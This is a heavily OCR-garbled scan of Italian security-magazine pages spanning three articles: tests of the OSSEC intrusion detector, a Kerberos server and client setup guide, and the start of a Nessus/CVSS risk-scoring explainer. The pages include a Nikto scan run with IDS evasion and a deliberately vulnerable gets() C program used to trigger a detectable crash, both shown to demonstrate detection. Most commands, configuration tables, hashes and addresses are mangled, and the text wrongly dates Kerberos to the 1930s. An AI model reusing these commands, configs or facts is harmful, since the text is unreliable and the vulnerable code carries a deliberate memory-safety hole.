[*] Done. 

Osserviamo quindi il comportamento 
dell'HIPS. 

Come ci aspettavamo la generazione 
degli alert [via terminate, mail e WUI) ci 
inferma puntualmente dell'accaduto: 

** Alert 1269215456.1998: mail - 
- syslog,ssha,authentioation_ - 
failures, 

2010 Mar 32 17 ! 13 ì 30 WWw->/ -> 

var/log/authlog 

nule: 5720 (leve! 10) -> 'Mul 

■> tiple sshd àathentieation -> 



SShdi3094] : 



ssM[11785] : FaileS . 
for root tran 93.42,11 
jjort 35545 ssh2 



Un tipica esempio di avviso offerto 
ch'interfaccia tveo cf OSSEC, 

Dopo poco, inoltre, la modalità A.R. si 
preoccupa di bloccare in modo definitivo 
l'IP che origina l'attacco aggiungendolo 
nel file hosts.deny e nella tabella ossee 
fwtable di PF: 

# tail -f fvar/wmf osseo/ i 
logs / active -reeponses . log 
Sua Har 21 17:13:30 CET -> 
2010 . . ./host-<Jeny.sh afld 
93.42,111.225 1369188010, -i 
3S9S9 1720 

Sua Iter 21 17:13:30 CET - 
2010 . ../foawall-arop.sli add 
■> 93.42.1U.22S 1269188010, 
38989 5720 

# Preti -t «Bsec_fwtaU.« —> 
T show 

33.42.111,226 

# c&t /ete/hosts.deny 
A1L;93.42.111.226 



2 ■ WEB SERVER 
SCANNING 

In questo caso utilizzeremo Nikto per 
analizzare il web server da remoto speci- 
ficando come parametro di avvio l'abilita- 
zione delle tecniche di IDS evasioni 

# ./nikto, pi -evasimi 1 -h 



Celermente il sistema di alerti ng ci 
notifica svariati errori riscontrati nel 
file di Fog degli accessi di Apache: 

ts 31151 Brad {levai io 
u tnitiple web salvar 
100 error codee £rem same 
- Bouree ip." 
Porcioa ot ths log [sii 
93.42, IH. 226 - E22/ - 
Mar/2010:Ol:O6iI5 +0100] i 
"SET /fSf 6Kpjt.dat HTTP/ * 
1.0" 404 206 
93.42.111.226 - [22/ - 
Har/2010: CH;27; 14 +0100] - 
"SET /f£f6Npjt/ HT?P/1.0» - 
404 203 

93,42.111,z26 - [22/ -i 
Mar/2010;01:27:14 +01OOJ -. 
"SET /fSfS^ijt.rjploaaSeEvltt 
i HTTP/1.0" 404 216 



Interessante constatare che, qualora 
avessimo Mod_Security abilitato, 
non mancherebbero avvisi relati- 
vi anche a quest'ultimo, come di 
seguito: 

201Q Mar 22 01:06:02 www->/ 

v«/www/lor/s/Hrror_log 
Buie; 30118 (lavai 6J -> -, 
'Access attempt blocked by - 
Mod Seeurity. ' 

[Mon Mar 22 01:06:01 i 
2010] [errori [cliant - 
93.42.111.226] mod. sacurity: 



Dopo II chiasso fatto da Nikto, arriva 
puntuale come sempre la risposta 
del firewall: 

# tail -f / va* /www/ ossee/ -■ 
1 og s / a et i va - r espcn s e s , 1 og 
Hon Mar 22 01:06:15 CET - 
2010 .../hOBt-oeny.sh add -i 
93.42.111.226 1269216362. i 
4217 3011B 

Hon Mar 22 01:06:16 CET 
2 010- .../firewall -drop, 
sh add - -■ 93.42.111,226 
1269216362, 4217 30118 




t pfctl -t oEBBC_£wtabl# - 

53.42.111.226 

t eat /ete/hosts-deny 
AIi:93.42.111.226 



3 ■ BEBFAULT 
SU MICROSOFT 
WINDOWS 

In questa circostanza osserveremo il 
comportamento di OSSEO quando un 
agente (in q uesto caso quello collo- 
cato su! PC montante Windows) invia 
informazioni relative a processi ed 
eventi dell'host entro cui è attivo. 
Simuleremo pertanto un crash di un 
generico applicativo suscettibile ai 
Buffer Overflow vedendo come l'HIPS 
Intercetti l'apposito evento generato 
come Windows Event Log dal sistema 
immediatamente dopo il segfault 

Per far Ciò utilizzeremo un banale 
sorgente che sì commenta da solo (o 
almeno si spera), scritto per lo scopo: 

«include <stdio.h> 
maini ) ( 
char bu£[3] ; 
géts(buf ) ; 
retura 0; 
} 

Compiliamo, avviamo ed inseriamo 
qualche carattere in più per constatare 
l'effettivo crash del "programma". 
Un'occhiata agli alert ci riconfermerà 
la meticolosità di OSSEC: 

2010 Mar 22 01s40ill (PC- - 
Windowsl) «2.164.1.100— 

wiaEvtLog ! application: 
ERRORI 10 00) ! application Er- 
EOr: [no user) : no domain: 
SEX; Nome iteli' applicazio- 
ne ette lia generato l 'erre- 
rà! bef.cxe, ... einwrtanp: 
0K4ija6136S Mone del modulo 
che ha generato 1 ' errore : - - . 
I iti m. 0x00000000 Codice 
eccezione: OxcODOOOOS Offset 
errore OK61616161 



L'inserimento di una sfanga eccedente la 
dimenssme def buffer causa, ìwhCbM- 
m&ite, il crash dei programma. 



4 - INTEGRITY 
CHECKINE 

Dal momento che Windows si presta 
bene ai nostri scopi esemplificativi, 
ti nostra punto di riferimento sarà 
anche in questo caso l'agente "PC- 
Windowsl". 

Replicando il comportamento di un 
generico malware vedremo, operati- 
vamente, in cosa consìste il controllo 
di integrità condotto dall'HlPS, ana- 
lizzando, come fatto finora, un alert 
generato. 

La prima cosa che ci viene in mente 
di fare è modificare un file di sistema 
andandone a variare il checksum 
storicizzato da OSSEC in fase di 
primo avvio dell'agente. 

Di seguito quindi l'immediato riscon- 
tro offerto dopo averne editato a 
mano uno a caso: "C:\Windows\win, 



CONCLUSIONI 
E RIFERIMENTI 

Appaiono evidenti le avanzate caratteri- 
stiche e peculiarità offerte dall'applicativo 
in qualunque contesto operativo; di gran 
lunga alla pari, se non migliori, rispetto 
alle alternative commerciali generalmente 
adoperate in contesti errterprise. 

Risulterà quindi quasi scontato capire 
che, malgrado il discorso intrapreso 
sulla rivista sia stato pensato per Offrire 
un quadro deUHIDS quanto più esteso 
possibile, la quantità di azioni e processi 
gestibili da OSSEC è talmente notevole 
da rendere anche la nostra trattazione 
limitativa 

Come abbiamo avuto modo di segnala- 
re, ladkxumetitazione è davvero tanta 
cosi come altrettanto grosse sono le 
possibilità offerte dalla suite, Anche qui, 
quindi, segnaliamo alcuni riferimenti, da 
intendersi come complementari a quelli 
già offerti nella prima parte di questo 
articolo. 

Non Ci resta che augurarvi buon diverti- 
mento e buona sperimentazione! 



'riferimenti 



Integriti» ehecksum càanged - 
for; 'CìWlindows/wìn.ini' 
Sise cliangèd freni l i03' to -i 
'409' 

Old mdSsim was: *f 3cbSB93d927 

- cbBedeee792928eedlc3' 
Hew mdSBiua il ! ^OflbblOfo 

fc3782S9c3aaa722£bSd49' 
Old shalsuu wifi: 1 24b0cl56a97 

- 4b4101304*51a6O55dÈ23- 
bOOOaÉSd' 

Hew shalevm is : *24cl5B61a4 

- e25834013tfc7f3Bf9b2£bc6- 
dfSbeS' 

Il discorso è del tutto simile, ovvia- 
mente, per eventuali variazioni al 
registro di sistema. 
Lasciamo al lettore le prove del caso. 



I Website relativi agli apprativi analizzai 
t OpenBSDPF:www.opent3sd,or3/faQ/pf/ 

; Nikto: cirt.net/nikto2 

• Mod_Security: modsecurrty.org ■ 



. Alcune riferimenti online utili; 

I Buffer Overflow: wwwsiforge.org/ 

; artides/20Cl3/O4/15-bafexpÌTtml 

■ Buffer Overflow (2): www.owasp.org/ 

! indexphp/Bufler_Overflow 

l Ulteriori riferimenti: 

l Hacker Journal nr.195 
; "BufferOverfSovJ" 




Queste passo, tratta 
dal quarto canto della 
Divina Commedia di 
Dante, descrive Cerbero, 
in inglese Kerberos 
il mitico cane a tre teste pena dei 
golosi. 

Nel campo dell'irtforrnatica, questa 
bestia mitologica è stata utilizzata 
come nome e simbolo di un noto 
protocollo per l'autenticazione 
dei servizi di rete, il Kerberos, 
contraddistinto da un'architettura 
definita three-sided. Questo termine 
significa che il protocollo utilizza tre 
componenti per raggiungere il suo 
obiettivo di spedizione affidabile 
dei dati attraverso una rete: uno 
di essi è il client, che rappresenta 
l'utente, il secondo è il server, al 
quale si richiede l'accesso ed il terzo 
è un contenitore delle informazioni 
riguardanti le chiavi d'accesso. 
Per comprendere meglio come 
funziona il sistema, dobbiamo 
tornare indietro negli anni '30, 
quando Kerberos venne creato nei 
laboratori del Massachusetts Instittite 
of Technology, probabilmente 
il più famoso centro dì ricerca 
tecnologica del mondo. A quei 
tempi l'autenticazione degli utenti, 
necessaria per fornire servizi di rete 



avveniva attraverso la richiesta e 
l'invio di usemame e password, ed i 
suo trasporto era "in chiaro". Questo 
irò, significa che era possibile, e per 
alcuni servìzi lo è ancora, carpire le 
password spedite semplicemente 
ascoltando" lo scambio dì dati tra 
i server ed utente. 

Per alcuni servizi, come il classico 
telnet, le password sono spedite 
ancora senza nessun algoritmo di 
crittografia, rendendo il loro uso 
altamente sconsigliato in ambiti 
ie nei quali la sicurezza è necessaria 
^ L'operazione di ascolto dì un traffico 
i di rete si chiama packet sniffing, ed è 
talmente facile da sfruttare che anche 
una persona poco esperta e male 
intenzionata potrebbe fame uso. 

f° CHIAVI D! 

CR1TTD GRAFIA 



Una soluzione molto utilizzata 
per risolvere il problema è l'uso 
di protocolli sicuri che sfruttino lo 
scambio dì chiavi dì crittografia e 
spediscano i dati in maniera cifrai 
per esempio fa ssh. 
ratori del MIT si studiò un 
in grado di permettere lo 
azioni 



7AV 



eli autenticazione per vanificare 
eventuali tentativi di ascolto del 
traffico, allo scopo di ottenere dati di 
accesso validi. Per funzionare, come 
abbiamo già accennato, Kerberos 
utilizza tre componenti, client, server 
e KDC (Key Distributlon Center). 
All'atto dell'autenticazione è richiesto 
un Ticket, una sorta di biglietto 
d'entrata che permetta l'accesso 
al servizio per una sessione ad un 
determinato utente. Quando un 
utente cerca di connettersi ad una 
workstation Ohe sfrutta una rete 
autenticata con Kerberos, viene 
inviato un messaggio al KDC che 
richiede un TGT (Ticket Granting 
Ticket), un biglietto che permette 
di ottenere altri ticket senza doverli 
richiedere nuovamente ai KDC. 
Il messaggio inviato contiene il 
Principal, che è un utente o un 
servizio che può essere autenticato 
tramite Kerberos ed ha l'identificativo 
in questa forma: 

root [ /instanoe] SREftlM 

Il Realm è la definizione nella 
terminologia di Kerberos di una rete 
basata su questo sistema. Esso può 
essere costituito da più KDC e da un 
insieme arbitrario di client e server. 






Il Kdc controlla l'esistenza del ori nei pai 
nel suo database, e, nel caso riosca a 
travario, prepara un Tgt cifrandolo con 
la chiave dell'utente ed inviandolo a chi 
n? ha fatto richiesta. A questo punto il 
cileni decifra il Tgt utilizzando la chiave 
dell'utente, ricavata dalla password 
inserita, e la memorizza per un tempo 
variabile e limitato, durante il quale 
l'utente non ha solitamente bisogno di 
reinserire la sua password. 
Quando l'utente ha bisogno di 
autenticarsi per un servizio, il clìent 
richiede al Ticket Granfino. Service 
il ticket utilizzando il biglietto Tgt. 
Spesso il Kcfc ed il Tgs coincidono 
e si trovano sulla stessa macchina 
fisica, per risparmiare sui costi di 
gestione. Abbiamo accennato al fatte 
che i Ticket Granting Ticket hanno una 
durata, entro la quale l'utente non deve 
reinserire nuovamente la password. 

Questa caratteristica introduce 
un problema di sicurezza non 
banale: se il computer cliented il 
server Kdc non sono sincronizzati, 
un utente malizioso potrebbe 
usare ticket scaduti per accedere 
a servizi a lui negati. Per questo 
motivo, quando si configura una 
rete basata su Kerberos, dobbiamo 
preoccuparci di avere tutte le 
macchine sincronizzate, con uno 
scarto massimo standard dì cinque 
minuti, che eventualmente si può 
rimOdeHane secondo te nostre 
esigenze. Per farlo, possiamo utilizzare 
il Network Time Protocol, che fornisce 
una sincronizzazione automatica 
grazie ad un demone chiamato rrtpd. 

Esso è contenuto nel pacchetto 
ntp, ed è disponibile sia sui ed delle 
maggiori distribuzioni che su internet 
in vari indirizzi, tra i quali rpmfind.net. 
Per installarlo su una Debian si usa il 
comando: 

# apt-get instali ntp 

Mentre per le distribuzioni basate 
su rpm bisogna prima scaricare il 
pacchetto e poi installarlo con il solito: 

# rpm -ivh ntp-rersionc. rpn 



Possiamo configurarlo sia agendo sul 
file/etc/ntp.conf che con ii programma 
disponibile in Red Hat chiamato 

u redbat-config-date 

7ln entrambi i casi dovremo 
specificare un server di riferimento con 
il quale sincronizzare il nostro pC. ed 
una lista di quelli pubblici può essere 
trovata all'indirizzo; 
www.eecis.udel.edu/-mills/ntp/ 
servers.html. 

Il file di configurazione /etc/ntp.conf è 
mostrato nella Tabella 1, e l'unica cosa 
che dovremo fare è accertarci che 
tutti i file di configurazione dei pc, che 
costituiscono la nostra rete Kerberos, 
utilizzino gli stessi campi nella voce 
server, per averli tutti sincronizzati sulla 
stessa ora. 




TABELLA 1: 

Il file /etc/ntp.conf 

# /etc/ntp.conf, configuratici] 
for ntpd 

# ntpd vili use sy slogo if 
logfile is not defiaed 

# logfile /var/log/ntpd 
driÉtfile /var/lib/ntp/ntp. 
dri£t 

statsdic /var/log/ntpstats/ 
statistica loopstats 
pperstats cloekstats 
Siegen ioopstats file 
Ioopstats type day enable 
filcgen peerstats file 
peerstats type day enabie 
filegen cloekstats file 
cloekstats type day onsblo 



# sezione dedicata ai server 
per la sincroni2zaziORe, è 
importante clic 

# tutti i pc delle stessa LUI 
usino gli stessi indirizzi 
ip. 

server 193 .204. 114 .231 

server 131 . 188.44.45 

server 134.214.100.6 

Ora Che Siamo sicuri che tutti i 
pc della réte Kerberos sono stati 
sincronizzati, dobbiamo accertarci 
che sia ben configurato il Dns nella 
macchina che farà da server Kdc. 
Procediamo quindi con I 1 installazione 
dei pacchetti necessari nel server, 
utilizzando la distribuzione Red Hat 
come piattaforma di base. Sarà 
facile trasportare le stesse nozioni 
anche su macchine con installate 
altre distribuzioni, perciò lasciamo 
ai lettore il compito di adattare le 
soluzioni di questo articolo alle 
esigenze personali. 

Per prima cosa installiamo i pacchetti 
krb5-libs, krbS-server, krb5- 
workstation. Dopo aver installato 
il software necessario dobbiamo 
decidere come chiamare il nostro 
Realm. Una convenzione molto usata 
è quella di utilizzare lo stesso nome 
del dominio, utilizzando pero solo 
lettere maiuscole, come ad esempio 
HACKERJOURNAL.IT per il dominio 
hackerjoumai.it 
I due file di configurazione da 
modificare sono /etc/krb5.conf e/var/ 
kerberos/krbSkdc/kdc.conf 
Potete vedere un esempio di come 
vanno configurati questi due file nslle 
Tabelle 2 e 3. Ovviamente dovete 
sostituire ad "esempio.com" il vostro 
dominio, e ad "ESEWtPiO.COM" il 
vostro Realm, Dovete fare attenzione a 
non scambiare per errore maiuscole e 
minuscole, perché in questa situazione 
hanno diversi significati. 



TABELLA 2: 

Esempio di file /etc/krb5.conf 

[loggiag] 
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de fault = FILE :/var/ log/ 
krbSlibs . log 

lede ■ FILE:/var/log/ 
krb5kdc.log 

adtain_3erver - Fii£:/var/ 
log/kadmìnd.lotj 

[liodefaults] 
ticketlifefcùns = 24000 
dcfault_realB = ESEMPIO- CQM 
dns_lookup_realm = false 
dns looktlp kdc = false 

[Maino] 

ESEMPIO.COM = { 

kdc = kerberos. esempio, 
coni: 83 

admin^server =* kerberos, 
esempio .coms 749 

default domain = esempio - 



[dranaiu_realm] 
-esempio, coni = ESEMPI0.COM 
eserapio.com = ESEHPI0.COM 

[kdcl 

profile = /var/kerberos/ 
krbSkdc/kdc . eonf 



[appdefaults] 

pam - { 
debug - false 
ticket^lifetrne - 36000 
tenew_lifctiine = 36000 
forwardabla » true 
krbi coavert = false 



TABELLA & 
Esempio dei file di 
configurazione /var/kerberos/ 
krb5kdc/kdc.conf 

kdedefawlta] 

acljile ■ /vac/karbetos/ 
krb5kdc/kadm5 - acl 

dictjile - /usr/share/diet/ 
words 

admin_keytab = /var/ 
kerberos /'krbSkdc/kadmS . keytah 

v4_mode - nopreauth 

Irealms] 
ESEMPI0.COM - { 



usaste r_key_type = des-ebc- 
crc 

supported_enctypes - 
des 3 -ebe -shai : normal 
desl-cbC'Shal :no«alm 
dss»3-obc-shal tonlyrealm 
des-ebe-crcrvi des-ebc- 
crc:afs3 des-ebe -ere: normal 
des-cbc-cre:norealfli 
des-cbc-crcsotilyrealm 
des-ebc-mdi des-ebc- 
md4:afs3 des-cbe-nid4:nori!ial 
ties-cbc-rnd4 : noreaìm 
des-cbc-md4 : onlyrealm 
des-cbG-mdS :v4 des-ebc- 
md5:afs3 d<js-ebe-md5 :nonaal 
des-cbc-md5 : norealni 
dcs-cbc-mdS : onlyrealm 
des-cbC"Sbali v4 des-ebc- 
shaliaf &3 das-cbc-shaì:norraal 
des-cbc-shal:norealni des-ebc- 
siia i : onlyreaJjB 

Dopo aver inserito i nostri dati nei 
due file di configurazione principali 
del server KDC, dobbiamo creare 
il database che conterrà le Chiavi, 
tramite il comando: 

# /usr/kerbecos/sbin/kdb5_ 
util create -s 

L'opzione -S serve per immagazzinar* 
la chiave del server in un file e se 
non specificata occorrerà roinserina 
ad ogni reboot del server. Una 
volta creato il database delle chiavi, 
dobbiamo stabilire quali princjpal 
avranno permesso di modificare il 
database delie chiavi di kerberos, 
agendo sul file di conf frazione / 
vaf/kerberoE/krbSkdG/kadmS.aci, 
Solitamente in questo file basterà 
inserire questa unica linea: 

*/admin8ESEHPI0.C0M * 



dove la voce prima dello V indica 
l'utente, la stringa compresa tra lo 
slash e la chiocciola indica l'istanza, e j 
la parte finale indica il Realm. 



KADMIN 



Per amministrare i principal si 
utilizzerà il programma kadmìn, che 
si connette al demone kadmird 
utilizzando un'autenticazione 
Kerberos. Ovviamente per poterlo 
utilizzare l'amministratore dovrà 
creare almeno un Principal di 
partenza, con il quale potrà 
successivamente eseguire kadmin. 
Per creare il primo principal, basterà 



la quale indica ai server Kerberos che 
qualsiasi utente che abbia un'istanza 
di admin nel reaìm ESEMPIO.COM, 
possiede anche pieni poteri sui 
database. Le istanze, come al solito, 
vengono indicate nel principal in un 
modo simile a questo: 

matfadmin@ESErVlPL0.COM 




eseguire il comando: 



# /usr/korbcroSj 
locai -g "addpr; 



ro s/sbin/ kattai» 
dpEinc max/adml 



Il comando kadmìn.local si usa 
solamente nello stesso host del 
Kdc e non utilizza l'autenticazione 
su Kerberos, che, d'altra parte, ™ 
non sarebbe ancora disponibile a 
causa dell'assenza di principal nel 
database. Lo stesso comando si può 
utilizzare per aggiungere altri utenti, 
come ad esemplo: 

# /usr/kerberos/sbin/kadmin, 
locai ,J addpEÌnc max" 

L'utente appena creato non possiede 
un'istanza di admin ed è considerato 
quindi un utente standard. Dopo 
aver aggiunto gli utenti, dovremo far 
partire i demoni per Kerberos: 

# /etc/iait.d/krbSkde start 
t /ete/ìnit.d/kadmin start 
S /etc/init..a7krb5Z4 start 

Per farli partire automaticamente 
ad ogni avvio possiamo utilizzare il 
programma chkconf ig: 

tt ehkcontig — 'levo! 345 
krbSkdo on 

.# chkcoofig — level 345 
kadmin on 

# chkconfìg — level 345 
krb524 on 




Abbiamo quindi terminato la 
configurazione del server. Prima di 
passare ai client è necessario porre 
attenzione ancora su qualche aspetto 
di sicurézza. Data la centralità dei 
sistema di autenticazione Kerberos, è 
indispensabile per un amministratore 
avere la certezza che la macchina 
che funge da Kdc sia protetta contro 
accessi non autorizzati. 

I comandi Che abbiamo appena 
visto possono permettere ad un 
intruso di creare un personal e 
conseguentemente di avere accesso 
a tutti i computer che fanno uso 
dell'autenticazione Kerberos. 
Inoltre, la sicurezza di questo 
sistemasi estende solo ai programmi 
che fanno USO dell'autenticazione 
Kerberos, quindi dovremo sostituire 
i programmi insicuri con applicativi 
che offrono già il supporto a questo 
sistema, inutile dire che se un Utente 
Utilizza il classico telnet, lascia che 
la sua password venga trasmessa in 
chiare. Se questa disgraziatamente 
è la stessa utilizzata per Kerberos, 
allora il suo account è compromesso 
indipendentemente dalla sicurezza del 
sistema dei wiit. 



IL CLIENT 



Per proseguire con il nostro esempio 
'.W' di campo applicativo di Kerberos, 
^ configureremo una macchina client 
.Jj per supportarne l'autenticazione. Se 
w .stiamo installando da zero ii client, 
W. r possiamo utilizzare l'apposito pannello 
- - di configurazione che viene fornito 

con il setup della Red Hat : alla voce 
tJÈ configurazione dell'autenticazione 
^HHci viene permesso di utilizzare 

'~ Kerberos, scegliendo tra le tre opzioni 
disponibili (Accesso ad una rete che 
usa Kerberos, accesso ad un Kdc o 
accesso ad una macchina che utilizza 
kdamind). 

Se invece dovete effettuare questo 
procedimento dopo la prima 
installazione, allora dovete assicurarvi 
dì aggiungere i pacchetti krb5-libs 
e krb5-workstation, ed eseguire il 



programma autheonfig. 

In generale le operazioni da fare sono 
copiare il file /efc/krb5.conf in tutti i 
client e cambiare il file /var/kerberos/ 
krbSkdc/kdc.conf in modo coerente. 
Dopo avercreato correttamente questi 
due file, dobbiamo creare un princlpai 
corrispondente ail'host da aggiungere 
alla rete. Per fare quest'ultimo 
passaggio dovremo eseguire nel Kdc: 

Che ci fornirà una console con la quale 
andiamo ad aggiungere Thost 

# addprinc -randkey host/ 
clienti , esempio . ™ 

□ove la parte successiva al T 
corrisponde al nome dell'host da 
aggiungere. L'opzione randkey serve 
a creare una chiave casuale. Dopo 
aver creato il p ri ne ipsi per il client, ne 
estrapoliamo le chiavi: 

# ktadd -k /ctc/krbS .keytab 
host/ clienti , esempio . cori 

Ora abbiamo a disposizione un 
sistema Kerberos 5 funzionante, ma 
dobbiamo assicurarci che i programmi 
utilizzino questo sistema per 
autenticare i loro utenti. 

In generale, un'applicazione deve 
già essere stata pensata per un 
determinato sistema di autenticazione, 
quindi è necessario cercare la versione 
che utilizza kerberos 0 ricompilare i 
sorgenti dopo averli modificati allo 
scopo. 



MUDLJLI DI 
A UTENTI GAZI □ N E 



I moduli di autenticazione Pam 
ci vengono in aiuto, fornendo un 
livello di astrazione sufficiente 
ad evitare la ricompilazione 
e l'adattamento di tutte le 
applicazioni che li utilizzano. 
Per esempio, per l'accesso al 
Sistema il file di configurazione per 



l'autenticazione è /etc/pam.d/login, 
e modificando questo file in tutti i 
client potremo utilizzare Kerberos per 
il login di sistema. Un esempio della 
configurazione per il login e per il 
servizio Ftp è mostrato nella Tabella 4. 

Ovviamente dovremo configurare 
ogni file dì configurazione della 
directory /etc/pam.d relativo ai servizi 
Che vorremo autenticare attraverso 
Kerberos. 



TABELLA 4: 

Utilizzo di kerberos in /etc/pam.d/ 
login 

I / e tc/pam . d/ login 

auth reejuired / 1 in/ secar ity/ 
pard seeuFcfcty . so 
auth required /lib/security/ 
paranologin , so 

auth sufficient /lib/seeurity/ 
pafli_krb5 . so 

auth required /lìb/security/ 
pamjjwdb . so shadow nullok 
use_fir st_pas s 

tt /etc/pam.d/ ftp 

auth required /lib/securìty/ 

pam_listfile.so item»user 

sense=dsny iìle=/etc/ftpusers 

onerr=succccd 

auth sufficient /lib/security/ 
pam_krb5 . so 

auth required /lib/sectirity/ 
pan_pwdb . so shadow nullok 
UEe_fir5t_paa s 

auth required /Ub/security/ 
pam_sbclls.so 



□ □NCLUSIDN! 



Ora che abbiamo imparato come 
utilizzare un sistema di difesa 
abbastanza potente, dobbiamo 
essere sicuri che ogni componente 
utilizzato lo sfrutti, eventualmente 
eliminando gli altri sistemi di 
autenticazione, togliendo gli utenti dai 
sistemi non Kerberos ed obbligandoli 
quindi al suo utilizzo, magari dopo un 
periodo dì test. 
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essus è un software 
proprietario di tipo 
client-server che 
tramite lo scan e 
l'abilitazione di plugin 



configurabili a seconda della 
tipologia di nost e vulnerabilità Che 
si andrà ad analizzare, rileva le 
vulnerabilità presenti suggerendo le 
possibili soluzioni creando report di 
facile analisi in vari formati (HTML , 
pdf, etc etc), 

Questo è un analizzatore di rete è 
stato creato da Renaud Deraison ed 



è ormai portato avanti da migliaia c 
volontari sparsi In tutto il mondo. 

PREMESSA 



Nessus utilizza come indicatore del 
livello di rischio per le vulnerabilità 
individuate il Risk Factor base del 
Common Vulnerabìlity Scori ng 
System tCVSS). 
Se andiamo ad analizzare la 
metodologìa descritta dal FIRST 
[Complete Guide to the Common 



Vulnerabìlity Scorìng System Version 
2.0 Cfr,[1 ] ) notiamo che essa può 
essere considerata, a lutti gli effetti, 
una analisi dei rischi minimale per il 
trattamento delle vulnerabilità relative 
al mondo internet: in effetti il CVSS 
opera con tre gruppi di metriche: 

1. Base; 

2. Temperai; 

3. Environmental. 

Ogni gruppo genera un valore 
numerico (da 1 a 10) ad un vettore 
che riflette i valori utilizzati per il 







RISCHIO 



calcolo. La metrica Base Indica 
if rischio assoluto legato alla 
vulnerabilità, senza considerare 
l'esistenza ed il livello delie 
contromisure [patch] e l'ambiente 
nel quale opera il sistema. 
La metrica Temporal rappresenta 
l'evoluzione della vulnerabilità 
nei tempo (esistenza e livello 
delle patch, ecc.). La metrica 
Environmental personal «sa il rischio 
legandolo alla realtà operativa del 
sistema esaminato. In generale, fa 
metriche di base e temporali sono 
calcolate dai produttori e riportate 
nei bollettini sulle vulnerabilità, 
mentre quelle di ambiente sono 
valorizzate dagli utenti finali, gli 
unici a fondo conoscere la realtà 
sotto esame. 

Per la metodologia le uniche 
metriche obbligatone sono 
quelle base. Il corretto utilizzo 
delle metriche Temporal ed 
Environmental, tuttavìa, consenta 
di legare il valore di rischio della 
metrica base alla realtà sotto esame 
(Environmental) e di ottenere il 
rischio residuo. 



L'utilizzo delle metriche temporali 
e di ambiente è opzionale, questo 
processo deve essere utilizzato 
quando si richiede di riportare il 
rischio nell'ambiente dell'utente 
finale. La valutazione delle metriche 
temporali, cosi come quella delle 
metriche di ambiente, è calcolata su 
una scala da 1 a 10. 



IL CALCDLD GVSS 



PBr comprendere ed utilizzare in 
maniera corretta la metodologìa, 
occorre analizzare quali sono I 
parametri considerati in ogni gruppo 
di metriche e come essi vengano 
utilizzati per I calcolare i valori in 
gioco. Nel documento indicheremo 
solo le linee fondamentali della 
metodologia, rimandando per 
approfondimenti ed analisi delle 
formule per il calcolo del rischio 
e della sua mitigazione al sito 
ufficiale [1]. Non entreremo neanche 
in merito ai criteri adottati dagli 
ideatori della metodologia, sulla 
quale si potrebbero sollevare alcune 
obiezioni, tuttavia il CVSS può essere 
considerato come uno standard nella 
valutazione del rischio relativo alle 
vulnerabilità, e come tale va adottato. 



METRICHE DI BASE 



I parametri considerati nel gruppo di 
base sono riportati nella fig.2 



e se esistano o no requisiti aggiuntivi 
perché ciò accada. Le tre metriche 
misurano come la vulnerabilità impatti 
sulla confidenzialità, l'integrità e la 
riservatezza degli assei coinvolti, 

Rappresenta come la vulnerabilità può 
attivarsi; più l'attaccante può operare 
da remoto, maggiore è il livello di 
rischio. 

LOCAL(L): L'attacco è possibile solo 
in locale, 

ADJACENT NETWORK(A): L'attacco 
è possibile solo su reti locali. 
NETWORK(N); L'attacco è possibile 
da remoto. 

Misura la complessità Incontrata per 
portare a termine l'attacco. 
Minore è la complessità, più alto è il 
valore di rischio. 

HIGH(H): L'attacco richiede condizioni 
speciali per essere eseguito. 
MEDIUJM(M): L'attacco richiede 
condizioni particolari per essere 



LOW(L): L'attacco non richiede 
condizioni specifiche per essere 
eseguito. 

Misura quante credenziali servono 
per portare a termine l'attacco. Meno 
credenziali servono, maggiore è il 
rischio. 

MULTIPLE(M): L'attacco richiede più 
credenziali. 

SINGLE (S): L'attacco richiede un 
"single signon" 

NONE (N): L'attacco non richiede 
credenziali. 



L'Access Vector, l'Access Compiexity 
e le metriche di Authentication 
indicano come la vulnerabilità si attiva 



Misura l'impatto sulla riservatezza. 
Più aito è l'impatto, maggiore è il 
rischio. 
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reti/difficile 




NQNE(N); Nessun impatto. 
partial(P): Impatto parziale: 
l'attaccante può accedere ad 
alcune informazioni, ma senza poter 
scegliere quali. 

COMPLETE(C): Impatto totale: tutte 
le informazioni sono compromesse. 



Misura l'impatto sull : integrità delle 
informazioni, Maggiore è l'impatto, 
più alto è il rischio. 
NQNE1N): Nessun impatto. 
PARTIAL(P): Impatto parziale; 
l'attaccante può modificare alcune 
informazioni, ma senza poter 
scegliere quali. 

COMPLETE(C): impatto totale: 
tutte le informazioni possono essere 
modificate. 

Misura l'impatto sulla disponibilità 
del sistema. Più alto è l'impatto, 
maggiore è il rischio. 
NONE(N): Nessun impatto. 
PARTIAL(PJ: Impatto parziale: 
l'attaccante può rallentare o impedire 
parzialmente l'utilizzo del sistema. 
COMPLETE(C): Impatto totale: tutte 
le attività del sistema possono essere 
rallentate o impedite. 

I^aqì 'ifrtto r^n wtiìfrTR 

Come esempio di calcolo delle 
metriche di base prendiamo la Cisco 
Security Advisory: SNMP Version 3 
Authentication Vulnerabilities , per 
maggiori dettagli vedi [2j 
Il produttore ha calcolato il CVSS 
Base Score applicando le seguenti 
valorizzazioni: 



METRICHE 
TEMPORALI 



I rischi legati alle vulnerabilità 
cambiano con il passare del tempo, 
in base allo sviluppo di tecniche per 
sfruttare le vulnerabilità stesse ed alla 
individuazione delle contromisure. 

Indica lo stato dell'arte delle tecniche 
per sfruttare la vulnerabilità. 
Più è facile l'attuazione dell'attacco, 
maggiore è ii i rischio. 
UNPROVEN (U|: Non Ci sono 
tecniche disponibili o la tecnica 
stessa è solamente teorica. 
PROOF-OF-CONCEPT (POC): 
La tecnica è stata testata ma non 
è attuabile per la maggior parte dei 
sistemi senza personalizzazioni da 
parte di un attaccante esperto. 
FUNCTIONAL (F): La tecnica esiste 
ed è efficace sulta maggior parte dei 
sistemi affetti dalla vulnerabilità 
HIGH (H): La tecnica esiste, 0 non 
è richiesta, e Si attiva in maniera 
autonoma (es. worm o virus). 
NOT DE FIN ED (ND): La metrica non 
viene considerata nel calcolo della 
valorizzazione. 

[SgniÈlBfflgiiastìiPìi 

Indica il livello di maturità delle 
contromisure. Minore è il livello più 
atto è il rischio. 

OFFICI AL FIXM(OF): Esiste una 
contromisura completa ed ufficiale 
messa a disposizione dal produttore. 
TEMPO RABY FIX (TF); Esiste una 
contromisura ufficiale ma provvisoria. 
WORKAROUND (W); Esiste una 



Access Access Authentication ConfirJ&ntiality Inlegrìty Avalli 
Vettor Cnmpfaiity | j Impact Impact Imp 



Da questi dati risulta un CVSS Base 
Score IO . Il vettore è il seguente: 

AV:N/AC:L/Au:N/C:t/I:C/A:C 

La vulnerabilità è stata classificata 
dal sistema come CVE-200S-0960 ed 
è reperibile sull'archivio del National 
Vulnerability Database [NVD) gestito 
